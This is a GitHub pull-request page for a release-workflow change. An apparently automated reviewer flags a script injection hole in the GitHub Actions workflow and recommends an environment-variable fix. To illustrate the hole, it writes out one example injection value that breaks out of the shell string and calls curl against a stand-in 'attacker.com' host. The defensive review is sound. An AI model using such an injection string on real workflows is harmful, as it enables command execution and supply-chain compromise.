chore: allow manual triggers in release.yaml#5
Conversation
![devin-ai-integration[bot]](https://avatars.githubusercontent.com/in/811515?s=60&v=4){kind=small}
| shell: bash | ||
| run: | | ||
| TAG_NAME="${{ github.event.release.tag_name || github.ref_name }}" | ||
| TAG_NAME="${{ github.event.inputs.version || github.event.release.tag_name || github.ref_name }}" |
There was a problem hiding this comment.
🔴 Script injection vulnerability via unsanitized github.event.inputs.version in shell command
The github.event.inputs.version value is directly interpolated into a bash script via the ${{ }} expression syntax on line 40. GitHub Actions evaluates this expression and pastes the raw result into the script before bash executes it. Since workflow_dispatch inputs are free-form strings (unlike git tag names which have character restrictions), a user with write access could provide a crafted version string like "; curl attacker.com/exfil?t=$(cat /dev/urandom); echo " which would break out of the double-quoted string and execute arbitrary commands. This injection occurs before the version regex validation on line 43, so the malicious code runs regardless. The workflow has id-token: write permission and publishes to PyPI via trusted publishing, so exploitation could lead to publishing malicious packages.
Recommended fix: use an environment variable instead of inline expression
Pass the value as an environment variable so it cannot break out of the script:
- name: Set version from release tag
shell: bash
env:
TAG_NAME: ${{ github.event.inputs.version || github.event.release.tag_name || github.ref_name }}
run: |
VERSION="${TAG_NAME#v}"
...This way the value is set in the process environment by the runner, not injected into the script text.
Prompt for agents
In .github/workflows/release.yml, the 'Set version from release tag' step (around line 37-53) directly interpolates github.event.inputs.version into the shell script using ${{ }} expression syntax, which is vulnerable to script injection. Fix this by passing the value as an environment variable instead:
1. Add an `env` block to the step:
env:
TAG_NAME: ${{ github.event.inputs.version || github.event.release.tag_name || github.ref_name }}
2. Change line 40 from:
TAG_NAME="${{ github.event.inputs.version || github.event.release.tag_name || github.ref_name }}"
to:
# TAG_NAME is now set via the env block above, no change needed
(simply remove the TAG_NAME assignment line, or change it to just use the env var)
This ensures the untrusted input is passed through the environment rather than being interpolated into the script text, preventing shell metacharacter injection.
Was this helpful? React with 👍 or 👎 to provide feedback.
2 participants
Uh oh!
There was an error while loading. Please reload this page.